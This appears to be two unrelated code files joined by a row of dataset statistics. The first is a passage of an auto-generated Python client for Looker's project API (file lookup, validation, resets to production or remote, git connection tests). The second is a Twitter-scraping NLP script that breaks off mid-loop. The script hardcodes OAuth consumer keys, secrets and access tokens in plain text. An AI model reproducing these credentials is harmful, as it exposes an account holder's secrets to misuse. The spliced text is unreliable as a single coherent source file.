>>> thread = api.project_file_with_http_info(project_id, file_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str file_id: File Id (required)
:param str fields: Requested fields
:return: ProjectFile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'file_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `project_file`") # noqa: E501
# verify the required parameter 'file_id' is set
if ('file_id' not in params or
params['file_id'] is None):
raise ValueError("Missing the required parameter `file_id` when calling `project_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'file_id' in params:
query_params.append(('file_id', params['file_id'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/files/file', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProjectFile', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_validation_results(self, project_id, **kwargs): # noqa: E501
"""Cached Project Validation Results # noqa: E501
### Get Cached Project Validation Results Returns the cached results of a previous project validation calculation, if any. Returns http status 204 No Content if no validation results exist. Validating the content of all the files in a project can be computationally intensive for large projects. Use this API to simply fetch the results of the most recent project validation rather than revalidating the entire project from scratch. A value of `\"stale\": true` in the response indicates that the project has changed since the cached validation results were computed. The cached validation results may no longer reflect the current state of the project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_validation_results(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectValidationCache
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.project_validation_results_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.project_validation_results_with_http_info(project_id, **kwargs) # noqa: E501
return data
def project_validation_results_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Cached Project Validation Results # noqa: E501
### Get Cached Project Validation Results Returns the cached results of a previous project validation calculation, if any. Returns http status 204 No Content if no validation results exist. Validating the content of all the files in a project can be computationally intensive for large projects. Use this API to simply fetch the results of the most recent project validation rather than revalidating the entire project from scratch. A value of `\"stale\": true` in the response indicates that the project has changed since the cached validation results were computed. The cached validation results may no longer reflect the current state of the project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_validation_results_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectValidationCache
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_validation_results" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `project_validation_results`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/validate', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProjectValidationCache', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_workspace(self, project_id, **kwargs): # noqa: E501
"""Get Project Workspace # noqa: E501
### Get Project Workspace Returns information about the state of the project files in the currently selected workspace # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_workspace(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectWorkspace
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.project_workspace_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.project_workspace_with_http_info(project_id, **kwargs) # noqa: E501
return data
def project_workspace_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get Project Workspace # noqa: E501
### Get Project Workspace Returns information about the state of the project files in the currently selected workspace # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_workspace_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectWorkspace
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `project_workspace`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/current_workspace', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProjectWorkspace', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reset_project_to_production(self, project_id, **kwargs): # noqa: E501
"""Reset To Production # noqa: E501
### Reset a project to the revision of the project that is in production. **DANGER** this will delete any changes that have not been pushed to a remote repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reset_project_to_production(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Id of project (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.reset_project_to_production_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.reset_project_to_production_with_http_info(project_id, **kwargs) # noqa: E501
return data
def reset_project_to_production_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Reset To Production # noqa: E501
### Reset a project to the revision of the project that is in production. **DANGER** this will delete any changes that have not been pushed to a remote repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reset_project_to_production_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Id of project (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reset_project_to_production" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `reset_project_to_production`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/reset_to_production', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reset_project_to_remote(self, project_id, **kwargs): # noqa: E501
"""Reset To Remote # noqa: E501
### Reset a project development branch to the revision of the project that is on the remote. **DANGER** this will delete any changes that have not been pushed to a remote repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reset_project_to_remote(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Id of project (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.reset_project_to_remote_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.reset_project_to_remote_with_http_info(project_id, **kwargs) # noqa: E501
return data
def reset_project_to_remote_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Reset To Remote # noqa: E501
### Reset a project development branch to the revision of the project that is on the remote. **DANGER** this will delete any changes that have not been pushed to a remote repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reset_project_to_remote_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Id of project (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reset_project_to_remote" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `reset_project_to_remote`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/reset_to_remote', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def run_git_connection_test(self, project_id, test_id, **kwargs): # noqa: E501
"""Run Git Connection Test # noqa: E501
### Run a git connection test Run the named test on the git service used by this project and return the result. This is intended to help debug git connections when things do not work properly, to give more helpful information about why a git url is not working with Looker. They are intended to be run in the order they are returned from the /projects/ID/git_connection_tests endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.run_git_connection_test(project_id, test_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str test_id: Test Id (required)
:return: GitConnectionTestResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.run_git_connection_test_with_http_info(project_id, test_id, **kwargs) # noqa: E501
else:
(data) = self.run_git_connection_test_with_http_info(project_id, test_id, **kwargs) # noqa: E501
return data
def run_git_connection_test_with_http_info(self, project_id, test_id, **kwargs): # noqa: E501
"""Run Git Connection Test # noqa: E501
### Run a git connection test Run the named test on the git service used by this project and return the result. This is intended to help debug git connections when things do not work properly, to give more helpful information about why a git url is not working with Looker. They are intended to be run in the order they are returned from the /projects/ID/git_connection_tests endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.run_git_connection_test_with_http_info(project_id, test_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str test_id: Test Id (required)
:return: GitConnectionTestResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'test_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method run_git_connection_test" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `run_git_connection_test`") # noqa: E501
# verify the required parameter 'test_id' is set
if ('test_id' not in params or
params['test_id'] is None):
raise ValueError("Missing the required parameter `test_id` when calling `run_git_connection_test`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
if 'test_id' in params:
path_params['test_id'] = params['test_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git_connection_tests/{test_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GitConnectionTestResult', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_project(self, project_id, body, **kwargs): # noqa: E501
"""Update Project # noqa: E501
### Update Project Configuration Apply changes to a project's configuration. #### Configuring Git for a Project To set up a Looker project with a remote git repository, follow these steps: 1. Call `update_session` to select the 'dev' workspace. 1. Call `create_git_deploy_key` to create a new deploy key for the project 1. Copy the deploy key text into the remote git repository's ssh key configuration 1. Call `update_project` to set project's `git_remote_url` ()and `git_service_name`, if necessary). When you modify a project's `git_remote_url`, Looker connects to the remote repository to fetch metadata. The remote git repository MUST be configured with the Looker-generated deploy key for this project prior to setting the project's `git_remote_url`. To set up a Looker project with a git repository residing on the Looker server (a 'bare' git repo): 1. Call `update_session` to select the 'dev' workspace. 1. Call `update_project` setting `git_remote_url` to nil and `git_service_name` to \"bare\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_project(project_id, body, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param Project body: Project (required)
:param str fields: Requested fields
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_project_with_http_info(project_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_project_with_http_info(project_id, body, **kwargs) # noqa: E501
return data
def update_project_with_http_info(self, project_id, body, **kwargs): # noqa: E501
"""Update Project # noqa: E501
### Update Project Configuration Apply changes to a project's configuration. #### Configuring Git for a Project To set up a Looker project with a remote git repository, follow these steps: 1. Call `update_session` to select the 'dev' workspace. 1. Call `create_git_deploy_key` to create a new deploy key for the project 1. Copy the deploy key text into the remote git repository's ssh key configuration 1. Call `update_project` to set project's `git_remote_url` ()and `git_service_name`, if necessary). When you modify a project's `git_remote_url`, Looker connects to the remote repository to fetch metadata. The remote git repository MUST be configured with the Looker-generated deploy key for this project prior to setting the project's `git_remote_url`. To set up a Looker project with a git repository residing on the Looker server (a 'bare' git repo): 1. Call `update_session` to select the 'dev' workspace. 1. Call `update_project` setting `git_remote_url` to nil and `git_service_name` to \"bare\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_project_with_http_info(project_id, body, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param Project body: Project (required)
:param str fields: Requested fields
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'body', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `update_project`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Project', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def validate_project(self, project_id, **kwargs): # noqa: E501
"""Validate Project # noqa: E501
### Validate Project Performs lint validation of all lookml files in the project. Returns a list of errors found, if any. Validating the content of all the files in a project can be computationally intensive for large projects. For best performance, call `validate_project(project_id)` only when you really want to recompute project validation. To quickly display the results of the most recent project validation (without recomputing), use `project_validation_results(project_id)` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.validate_project(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectValidation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.validate_project_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.validate_project_with_http_info(project_id, **kwargs) # noqa: E501
return data
def validate_project_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Validate Project # noqa: E501
### Validate Project Performs lint validation of all lookml files in the project. Returns a list of errors found, if any. Validating the content of all the files in a project can be computationally intensive for large projects. For best performance, call `validate_project(project_id)` only when you really want to recompute project validation. To quickly display the results of the most recent project validation (without recomputing), use `project_validation_results(project_id)` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.validate_project_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectValidation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `validate_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/validate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProjectValidation', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 44.061335 | 1,639 | 0.624737 | 8,791 | 73,274 | 4.992492 | 0.043226 | 0.054957 | 0.020415 | 0.026248 | 0.952243 | 0.947481 | 0.939074 | 0.933127 | 0.930962 | 0.921803 | 0 | 0.015975 | 0.28837 | 73,274 | 1,662 | 1,640 | 44.087846 | 0.825713 | 0.058042 | 0 | 0.819196 | 0 | 0 | 0.186599 | 0.047763 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.004464 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
bdef89e1de0b1bea16e519ac35a2614f1e82b1f4 | 57,331 | py | Python | scripts/nlpscript.py | JLivingston01/py_research | 928f74287039a933d27c5a5dc3df8db4cb79c152 | [
"MIT"
] | 1 | 2022-02-21T00:47:41.000Z | 2022-02-21T00:47:41.000Z | scripts/nlpscript.py | JLivingston01/py_research | 928f74287039a933d27c5a5dc3df8db4cb79c152 | [
"MIT"
] | null | null | null | scripts/nlpscript.py | JLivingston01/py_research | 928f74287039a933d27c5a5dc3df8db4cb79c152 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 6 16:04:14 2019
@author: jliv
"""
#PACKAGES
import oauth2
import datetime as dt
import re
import json
import matplotlib.pyplot as plt
import pandas as pd
from os import listdir
import gensim
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from gensim import corpora, models
from nltk.stem import WordNetLemmatizer
from nltk.stem import SnowballStemmer
from nltk.stem.porter import *
import nltk
import nltk.sentiment
import numpy as np
np.random.seed(2018)
from wordcloud import get_single_color_func
from wordcloud import WordCloud
import tensorflow
from tensorflow import keras
from tensorflow import losses
from keras.utils import np_utils
from sklearn.preprocessing import LabelEncoder
import pickle
#49-545, api pull, clean for 1 day of data
stopwords = nltk.corpus.stopwords
stop_words = set(stopwords.words("english"))
word_tokenize = nltk.tokenize.word_tokenize
query = 'https://api.twitter.com/1.1/search/tweets.json?l=en&q="Fox%20News"%20-Congrats%20-Stand%20-Laura%20-Why%20since%3A2019-01-29%20until%3A2019-01-30&result_type=recent&count=1000&tweet_mode=extended'
def req(query):
consumer = oauth2.Consumer(key='kq5bb4YfBfoLUXd90vCwq4RWX'.encode('utf-8'), secret='JzIDVyTToHGRpoSX61zQHr1QyXNVyOM7DHDLFrfIoK4q3XlMcA'.encode('utf-8'))
token = oauth2.Token(key='1047557115156602880-Lg0ZzFAXdRBE3MWvIjDoosgbrmqbFd', secret='XtYHGlsPUBxb2cc4O48NqXmrtVzEiplawEO3illlAHmKz')
client = oauth2.Client(consumer, token)
resp, content = client.request( query, method="GET", body=bytes("", "utf-8"), headers=None )
return content
#home_timeline = req(query)
#consumer = oauth2.Consumer(key='kq5bb4YfBfoLUXd90vCwq4RWX'.encode('utf-8'), secret='JzIDVyTToHGRpoSX61zQHr1QyXNVyOM7DHDLFrfIoK4q3XlMcA'.encode('utf-8'))
#token = oauth2.Token(key='1047557115156602880-Lg0ZzFAXdRBE3MWvIjDoosgbrmqbFd', secret='XtYHGlsPUBxb2cc4O48NqXmrtVzEiplawEO3illlAHmKz')
#client = oauth2.Client(consumer, token)
#resp, content = client.request( query, method="GET", body=bytes("", "utf-8"), headers=None )
def oauth_req(url, token, secret, http_method="GET", post_body="", http_headers=None):
consumer = oauth2.Consumer(key='kq5bb4YfBfoLUXd90vCwq4RWX '.encode('utf-8'), secret='JzIDVyTToHGRpoSX61zQHr1QyXNVyOM7DHDLFrfIoK4q3XlMcA '.encode('utf-8'))
token = oauth2.Token(key=token, secret=secret)
client = oauth2.Client(consumer, token)
resp, content = client.request( url, method=http_method, body=bytes(post_body, "utf-8"), headers=http_headers )
return content
searchterm = '"Lyft"'
terma = searchterm.replace('"',"")
terma = terma.replace(" ","")
language = 'en'
startdate = dt.datetime.now()
to_date = startdate + dt.timedelta(1)
startdate = dt.datetime.strftime(startdate,"%Y-%m-%d")
to_date = dt.datetime.strftime(to_date,"%Y-%m-%d")
#startdate = "2019-02-05"
#to_date = "2019-02-06"
max_tweets = 1000
appendix = "v1"
#exclude = ['-Congrats','-Stand','-Laura','-Why']
exclude = ['']
#How = mixed, recent or popular
how = 'mixed'
searchterm = searchterm.split()
searchterm = "%20".join(searchterm)
enddate = dt.datetime.strftime(dt.datetime.strptime(startdate,"%Y-%m-%d") +dt.timedelta(1),"%Y-%m-%d")
days = dt.datetime.strptime(to_date,"%Y-%m-%d") - dt.datetime.strptime(startdate,"%Y-%m-%d")
days = days.days
exclude = "%20".join(exclude)
parameters = (language,searchterm,startdate,enddate)
#raw_query="l={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type=mixed&count=1000".format(language,searchterm,exclude,startdate,enddate)
times = []
date = []
text = []
retweet_cnt = []
fvrt_cnt = []
user = []
user_flwrs=[]
user_statuses = []
timezone = []
'''len(text)
lengths = []
for i in text:
lengths.append(len(i))'''
#raw_query="l={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type=mixed&tweet_mode=extended&count=1000".format(language,searchterm,exclude,startdate,enddate)
#query = 'https://api.twitter.com/1.1/search/tweets.json?'+raw_query
#home_timeline = oauth_req(query, '986743245127503872-ePHRirA1hxJsMVPjogWbFSeZFmo4V5Q'.encode('utf-8'), 'N4PqSMhHGqjlZ2yqmLnPB8cFJgPXfMsj7PbzSrk55ageO'.encode('utf-8') )
raw_query="lang={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type={}&count=1000&tweet_mode=extended".format(language,searchterm,exclude,startdate,enddate,how)
query = 'https://api.twitter.com/1.1/search/tweets.json?'+raw_query
home_timeline = req(query)
home_timeline = home_timeline.decode("utf-8")
home_timeline = json.loads(home_timeline)
statuses = home_timeline['statuses']
print(len(statuses))
for i in range(len(statuses)):
times.append(statuses[i]['created_at'])
try:
text.append(statuses[i]['retweeted_status']['full_text'])
except:
text.append(statuses[i]['full_text'])
fvrt_cnt.append(statuses[i]['favorite_count'])
retweet_cnt.append(statuses[i]['retweet_count'])
user.append(statuses[i]['user']['name'])
user_flwrs.append(statuses[i]['user']['followers_count'])
user_statuses.append(statuses[i]['user']['statuses_count'])
timezone.append(statuses[i]['user']['time_zone'])
emojis = pd.read_csv('C://Users/jliv/Downloads/emojis.txt',sep = '\t', encoding = 'utf-8')
#Map of Unicode and Names
emoji_map = pd.DataFrame()
emoji_map['name'] = emojis['Name(s)']
emoji_map['code'] = emojis['Escaped Unicode']
#Map of Emojis and names
emoji_map1 = pd.DataFrame()
emoji_map1['name'] = emojis['Name(s)']
emoji_map1['Emoji'] = emojis['Emoji']
#Handle escape characters in unicode
codes = []
for i in list(emojis['Escaped Unicode']):
x = i.replace("\\","\\")
codes.append(x)
emojislist = emoji_map1['Emoji']
#Convert CSVs of mappings to dict mappings
emoji_map.index = codes
emoji_dict = emoji_map.to_dict()
emoji_dict = emoji_dict['name']
emoji_map1.index = emojislist
emoji_dict1 = emoji_map1.to_dict()
emoji_dict1 = emoji_dict1['name']
#Replace tweet emojis and unicode with descriptions of characters
emoji_clean = []
for i in text:
x = i
for k,v in emoji_dict1.items():
x = x.replace(k, v)
for k,v in emoji_dict.items():
x = x.replace(k, v)
emoji_clean.append(x)
tweetvector_clean = []
for i in emoji_clean:
